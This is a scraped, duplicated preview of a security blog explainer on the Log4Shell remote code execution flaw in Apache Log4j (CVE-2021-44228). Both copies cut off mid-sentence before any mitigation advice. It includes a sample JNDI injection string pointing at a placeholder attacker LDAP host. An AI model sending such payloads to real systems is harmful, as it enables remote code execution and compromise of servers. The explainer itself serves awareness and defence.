hacksheets
log4shell 0-day Exploit in log4j v2 - What it is? How to Identify and Mitigate the Vulnerability (CVE-2021-44228)
What is log4shell ?
“Log4Shell” got its name by researchers at LunaSec and credited to Chen Zhaojun of Alibaba. It is an remote code execution vulnerability. This vulnerability has been found in Apache Log4j library, which is an open source logging utility which is written in Java and developed by Apache Software Foundation. This library is used in a millions of applications, websites and services including iCloud, Minecraft, and Steam.
This issue was first discovered in Microsoft-owned Minecraft. LunaSec warns that “many, many services” are vulnerable to this exploit since Log4j is present in almost all major Java-based enterprise applications and servers. Also a warning is made that anybody using Apache Struts is “likely vulnerable.”
In an affected log4j versions, If an attacker can have control on log messages or log message parameters, they can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled
Check out the list of affected components/manufacturers -
github.com/YfryTchsGD/Log4jAttackSurface
How does the vulnerability works ?
The attack vector is very easy for attackers. A single string of text can trigger an application to reach out to an external location given that the logging is done via the vulnerable instance of log4j.
An attacker might supply special text in an HTTP User-Agent header or a simple POST form request, with the usual form:
${jndi:ldap://attackercontrolledhost.com/resource
…where
hacksheets.in/log4shell-0-day-exploit-in-log4j-v2-what-it...
log4shell 0-day Exploit in log4j v2 - What it is? How to Identify and Mitigate the Vulnerability (CVE-2021-44228)
What is log4shell ?
“Log4Shell” got its name by researchers at LunaSec and credited to Chen Zhaojun of Alibaba. It is an remote code execution vulnerability. This vulnerability has been found in Apache Log4j library, which is an open source logging utility which is written in Java and developed by Apache Software Foundation. This library is used in a millions of applications, websites and services including iCloud, Minecraft, and Steam.
This issue was first discovered in Microsoft-owned Minecraft. LunaSec warns that “many, many services” are vulnerable to this exploit since Log4j is present in almost all major Java-based enterprise applications and servers. Also a warning is made that anybody using Apache Struts is “likely vulnerable.”
In an affected log4j versions, If an attacker can have control on log messages or log message parameters, they can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled
Check out the list of affected components/manufacturers -
github.com/YfryTchsGD/Log4jAttackSurface
How does the vulnerability works ?
The attack vector is very easy for attackers. A single string of text can trigger an application to reach out to an external location given that the logging is done via the vulnerable instance of log4j.
An attacker might supply special text in an HTTP User-Agent header or a simple POST form request, with the usual form:
${jndi:ldap://attackercontrolledhost.com/resource
…where
hacksheets.in/log4shell-0-day-exploit-in-log4j-v2-what-it...